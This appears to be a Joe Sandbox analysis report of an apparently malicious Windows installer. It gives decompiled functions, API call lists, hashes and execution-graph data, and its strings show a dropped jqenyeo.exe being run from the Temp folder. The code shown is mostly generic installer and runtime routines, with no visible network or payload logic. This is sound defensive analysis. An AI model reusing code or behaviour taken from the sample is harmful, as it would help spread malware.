                                                          				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                          				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                          				 *0x40ce0f = 1;
                                                          				 *0x40ce0c = _t15 & 0x00000001;
                                                          				 *0x40ce0d = _t15 & 0x00000002;
                                                          				 *0x40ce0e = _t15 & 0x00000004;
                                                          				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                                          				_t18 = CreateFontIndirectW(0x40cdf8);
                                                          				_push(_t18);
                                                          				_push(_t31);
                                                          				E004065AF();
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                          				return 0;
                                                          			}











                                                          0x00401e4e
                                                          0x00401e59
                                                          0x00401e5b
                                                          0x00401e68
                                                          0x00401e7f
                                                          0x00401e84
                                                          0x00401e91
                                                          0x00401e96
                                                          0x00401e9a
                                                          0x00401ea5
                                                          0x00401eac
                                                          0x00401ebe
                                                          0x00401ec4
                                                          0x00401ec9
                                                          0x00401ed3
                                                          0x00402638
                                                          0x0040156d
                                                          0x00402ba4
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E51
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                          • ReleaseDC.USER32 ref: 00401E84
                                                            • Part of subcall function 004066A5: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                            • Part of subcall function 004066A5: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                          • String ID:
                                                          • API String ID: 2584051700-0
                                                          • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                          • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                          • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                          • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 59%
                                                          			E00401C43(intOrPtr __edx) {
                                                          				int _t29;
                                                          				long _t30;
                                                          				signed int _t32;
                                                          				WCHAR* _t35;
                                                          				long _t36;
                                                          				int _t41;
                                                          				signed int _t42;
                                                          				int _t46;
                                                          				int _t56;
                                                          				intOrPtr _t57;
                                                          				struct HWND__* _t63;
                                                          				void* _t64;
                                                          
                                                          				_t57 = __edx;
                                                          				_t29 = E00402D84(3);
                                                          				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                          				 *(_t64 - 0x18) = _t29;
                                                          				_t30 = E00402D84(4);
                                                          				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                          				 *(_t64 + 8) = _t30;
                                                          				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                          					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                          				}
                                                          				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                          				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                          					 *(_t64 + 8) = E00402DA6(0x44);
                                                          				}
                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                          				_push(1);
                                                          				if(__eflags != 0) {
                                                          					_t61 = E00402DA6();
                                                          					_t32 = E00402DA6();
                                                          					asm("sbb ecx, ecx");
                                                          					asm("sbb eax, eax");
                                                          					_t35 =  ~( *_t31) & _t61;
                                                          					__eflags = _t35;
                                                          					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                          					goto L10;
                                                          				} else {
                                                          					_t63 = E00402D84();
                                                          					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                          					_t41 = E00402D84(2);
                                                          					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                          					_t56 =  *(_t64 - 0x1c) >> 2;
                                                          					if(__eflags == 0) {
                                                          						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                          						L10:
                                                          						 *(_t64 - 0x38) = _t36;
                                                          					} else {
                                                          						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                          						asm("sbb eax, eax");
                                                          						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                          					}
                                                          				}
                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                          				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                          					_push( *(_t64 - 0x38));
                                                          					E004065AF();
                                                          				}
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                          				return 0;
                                                          			}















                                                          0x00401c43
                                                          0x00401c45
                                                          0x00401c4c
                                                          0x00401c4f
                                                          0x00401c52
                                                          0x00401c5c
                                                          0x00401c60
                                                          0x00401c63
                                                          0x00401c6c
                                                          0x00401c6c
                                                          0x00401c6f
                                                          0x00401c73
                                                          0x00401c7c
                                                          0x00401c7c
                                                          0x00401c7f
                                                          0x00401c83
                                                          0x00401c85
                                                          0x00401cda
                                                          0x00401cdc
                                                          0x00401ce7
                                                          0x00401cf1
                                                          0x00401cf4
                                                          0x00401cf4
                                                          0x00401cfd
                                                          0x00000000
                                                          0x00401c87
                                                          0x00401c8e
                                                          0x00401c90
                                                          0x00401c93
                                                          0x00401c99
                                                          0x00401ca0
                                                          0x00401ca3
                                                          0x00401ccb
                                                          0x00401d03
                                                          0x00401d03
                                                          0x00401ca5
                                                          0x00401cb3
                                                          0x00401cbb
                                                          0x00401cbe
                                                          0x00401cbe
                                                          0x00401ca3
                                                          0x00401d06
                                                          0x00401d09
                                                          0x00401d0f
                                                          0x00402ba4
                                                          0x00402ba4
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                          • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                          • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                          • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                          • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                          				int _v8;
                                                          				long _t21;
                                                          				long _t24;
                                                          				char* _t30;
                                                          
                                                          				asm("sbb eax, eax");
                                                          				_v8 = 0x800;
                                                          				_t5 =  &_a4; // 0x422728
                                                          				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                          				_t30 = _a16;
                                                          				if(_t21 != 0) {
                                                          					L4:
                                                          					 *_t30 =  *_t30 & 0x00000000;
                                                          				} else {
                                                          					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                          					_t21 = RegCloseKey(_a20);
                                                          					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                          					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                          						goto L4;
                                                          					}
                                                          				}
                                                          				return _t21;
                                                          			}







                                                          0x00406544
                                                          0x00406546
                                                          0x0040655b
                                                          0x0040655e
                                                          0x00406563
                                                          0x00406568
                                                          0x004065a6
                                                          0x004065a6
                                                          0x0040656a
                                                          0x0040657c
                                                          0x00406587
                                                          0x0040658d
                                                          0x00406598
                                                          0x00000000
                                                          0x00000000
                                                          0x00406598
                                                          0x004065ac

                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,?,?,0040679D,80000002), ref: 0040657C
                                                          • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,00422728), ref: 00406587
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk, xrefs: 0040653D
                                                          • ('B, xrefs: 0040655B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: ('B$C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
                                                          • API String ID: 3356406503-381762394
                                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                          • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                          • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E00405F37(WCHAR* _a4) {
                                                          				WCHAR* _t9;
                                                          
                                                          				_t9 = _a4;
                                                          				_push( &(_t9[lstrlenW(_t9)]));
                                                          				_push(_t9);
                                                          				if( *(CharPrevW()) != 0x5c) {
                                                          					lstrcatW(_t9, 0x40a014);
                                                          				}
                                                          				return _t9;
                                                          			}




                                                          0x00405f38
                                                          0x00405f45
                                                          0x00405f46
                                                          0x00405f51
                                                          0x00405f59
                                                          0x00405f59
                                                          0x00405f61

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3916508600
                                                          • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                          • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                          • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                          • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                          				int _t15;
                                                          				long _t16;
                                                          
                                                          				_t15 = _a8;
                                                          				if(_t15 != 0x102) {
                                                          					if(_t15 != 0x200) {
                                                          						_t16 = _a16;
                                                          						L7:
                                                          						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                                          							_push(_t16);
                                                          							_push(6);
                                                          							 *0x423734 = _t16;
                                                          							E00404FFF();
                                                          						}
                                                          						L11:
                                                          						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                                          					}
                                                          					if(IsWindowVisible(_a4) == 0) {
                                                          						L10:
                                                          						_t16 = _a16;
                                                          						goto L11;
                                                          					}
                                                          					_t16 = E00404F7F(_a4, 1);
                                                          					_t15 = 0x419;
                                                          					goto L7;
                                                          				}
                                                          				if(_a12 != 0x20) {
                                                          					goto L10;
                                                          				}
                                                          				E00404610(0x413);
                                                          				return 0;
                                                          			}





                                                          0x00405642
                                                          0x0040564c
                                                          0x00405668
                                                          0x0040568a
                                                          0x0040568d
                                                          0x00405693
                                                          0x0040569d
                                                          0x0040569e
                                                          0x004056a0
                                                          0x004056a6
                                                          0x004056a6
                                                          0x004056b0
                                                          0x00000000
                                                          0x004056be
                                                          0x00405675
                                                          0x004056ad
                                                          0x004056ad
                                                          0x00000000
                                                          0x004056ad
                                                          0x00405681
                                                          0x00405683
                                                          0x00000000
                                                          0x00405683
                                                          0x00405652
                                                          0x00000000
                                                          0x00000000
                                                          0x00405659
                                                          0x00000000

                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0040566D
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                            • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                          • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                          • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                          • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                          				int _v8;
                                                          				int _t12;
                                                          				int _t14;
                                                          				int _t15;
                                                          				CHAR* _t17;
                                                          				CHAR* _t27;
                                                          
                                                          				_t12 = lstrlenA(_a8);
                                                          				_t27 = _a4;
                                                          				_v8 = _t12;
                                                          				while(lstrlenA(_t27) >= _v8) {
                                                          					_t14 = _v8;
                                                          					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                          					_t15 = lstrcmpiA(_t27, _a8);
                                                          					_t27[_v8] =  *(_t14 + _t27);
                                                          					if(_t15 == 0) {
                                                          						_t17 = _t27;
                                                          					} else {
                                                          						_t27 = CharNextA(_t27);
                                                          						continue;
                                                          					}
                                                          					L5:
                                                          					return _t17;
                                                          				}
                                                          				_t17 = 0;
                                                          				goto L5;
                                                          			}









                                                          0x004060cd
                                                          0x004060cf
                                                          0x004060d2
                                                          0x004060fe
                                                          0x004060d7
                                                          0x004060e0
                                                          0x004060e5
                                                          0x004060f0
                                                          0x004060f3
                                                          0x0040610f
                                                          0x004060f5
                                                          0x004060fc
                                                          0x00000000
                                                          0x004060fc
                                                          0x00406108
                                                          0x0040610c
                                                          0x0040610c
                                                          0x00406106
                                                          0x00000000

                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                          • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                          • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                          • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                          • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:15.3%
                                                          Dynamic/Decrypted Code Coverage:6.6%
                                                          Signature Coverage:5.1%
                                                          Total number of Nodes:1738
                                                          Total number of Limit Nodes:107
                                                          execution_graph 8197 402580 8198 4025b7 8197->8198 8199 4025aa 8197->8199 8201 40412d __cftof_l 6 API calls 8198->8201 8200 40412d __cftof_l 6 API calls 8199->8200 8200->8198 8206 4025c7 __except_handler4 8201->8206 8202 4026df 8203 402694 __except_handler4 8203->8202 8204 4026cf 8203->8204 8207 40412d __cftof_l 6 API calls 8203->8207 8205 40412d __cftof_l 6 API calls 8204->8205 8205->8202 8206->8202 8206->8203 8209 40261e __IsNonwritableInCurrentImage 8206->8209 8207->8204 8215 402c02 RtlUnwind 8209->8215 8210 4026f6 8212 40412d __cftof_l 6 API calls 8210->8212 8211 40265c __except_handler4 8211->8210 8213 40412d __cftof_l 6 API calls 8211->8213 8214 402706 __except_handler4 8212->8214 8213->8210 8215->8211 8216 401687 8219 403c2e 8216->8219 8218 40168c 8218->8218 8220 403c51 8219->8220 8221 403c5e GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8219->8221 8220->8221 8222 403c55 8220->8222 8221->8222 8222->8218 6683 40150c 6684 401518 __wfsopen 6683->6684 6718 4033df GetProcessHeap 6684->6718 6686 40156d 6687 401578 6686->6687 6795 401660 6686->6795 6719 40304b 6687->6719 6690 40157e 6691 401589 __RTC_Initialize 6690->6691 6692 401660 _fast_error_exit 55 API calls 6690->6692 6740 4033f4 6691->6740 6692->6691 6694 401598 6695 4015a4 GetCommandLineW 6694->6695 6697 401660 _fast_error_exit 55 API calls 6694->6697 6759 403d0a GetEnvironmentStringsW 6695->6759 6698 4015a3 6697->6698 6698->6695 6701 4015be 6702 4015c9 6701->6702 6803 403128 6701->6803 6769 4038e5 6702->6769 6706 4015da 6783 403162 6706->6783 6708 403128 __lock 55 API calls 6708->6706 6709 4015e2 6710 4015ed 6709->6710 6711 403128 __lock 55 API calls 6709->6711 6789 401000 GetConsoleWindow ShowWindow 6710->6789 6711->6710 6713 40160a 6714 40161c 6713->6714 6810 4033cb 6713->6810 6813 403153 6714->6813 6717 401621 __wfsopen 6718->6686 6816 4031fa RtlEncodePointer 6719->6816 6721 403050 6822 4044e7 6721->6822 6724 403059 6826 4030c1 6724->6826 6729 403076 6838 40456d 6729->6838 6732 4030b8 6734 4030c1 __mtterm 58 API calls 6732->6734 6736 4030bd 6734->6736 6735 403097 6735->6732 6737 40309d 6735->6737 6736->6690 6847 402f98 6737->6847 6739 4030a5 GetCurrentThreadId 6739->6690 6741 403400 __wfsopen 6740->6741 6742 4043b6 __lock 55 API calls 6741->6742 6743 403407 6742->6743 6744 40456d __calloc_crt 55 API calls 6743->6744 6746 403418 6744->6746 6745 403423 __wfsopen @_EH4_CallFilterFunc@8 6745->6694 6746->6745 6747 403483 GetStartupInfoW 6746->6747 6753 403498 6747->6753 6756 4035c7 6747->6756 6748 40368f 7103 40369f 6748->7103 6750 40456d __calloc_crt 55 API calls 6750->6753 6751 403614 GetStdHandle 6751->6756 6752 403627 GetFileType 6752->6756 6753->6750 6754 4034e6 6753->6754 6753->6756 6755 40351a GetFileType 6754->6755 6754->6756 6757 403de5 __getstream InitializeCriticalSectionAndSpinCount 6754->6757 6755->6754 6756->6748 6756->6751 6756->6752 6758 403de5 __getstream InitializeCriticalSectionAndSpinCount 6756->6758 6757->6754 6758->6756 6760 4015b4 6759->6760 6761 403d1b 6759->6761 6765 4036a8 GetModuleFileNameW 6760->6765 6762 4045b5 __malloc_crt 55 API calls 6761->6762 6764 403d41 _memmove 6762->6764 6763 403d57 FreeEnvironmentStringsW 6763->6760 6764->6763 6766 4036dc _wparse_cmdline 6765->6766 6767 4045b5 __malloc_crt 55 API calls 6766->6767 6768 40371c _wparse_cmdline 6766->6768 6767->6768 6768->6701 6770 4038fe __NMSG_WRITE 6769->6770 6774 4015cf 6769->6774 6771 40456d __calloc_crt 55 API calls 6770->6771 6779 403927 __NMSG_WRITE 6771->6779 6772 40397e 6773 404535 _free 55 API calls 6772->6773 6773->6774 6774->6706 6774->6708 6775 40456d __calloc_crt 55 API calls 6775->6779 6776 4039a3 6777 404535 _free 55 API calls 6776->6777 6777->6774 6778 406f70 __NMSG_WRITE 55 API calls 6778->6779 6779->6772 6779->6774 6779->6775 6779->6776 6779->6778 6780 4039ba 6779->6780 6781 4017fe __invoke_watson 8 API calls 6780->6781 6782 4039c6 6781->6782 6785 40316e __IsNonwritableInCurrentImage 6783->6785 7107 406ce6 6785->7107 6786 40318c __initterm_e 6788 4031ab __cinit __IsNonwritableInCurrentImage 6786->6788 7110 406cd1 6786->7110 6788->6709 7173 40142d 6789->7173 6796 401671 6795->6796 6797 40166c 6795->6797 6799 403a24 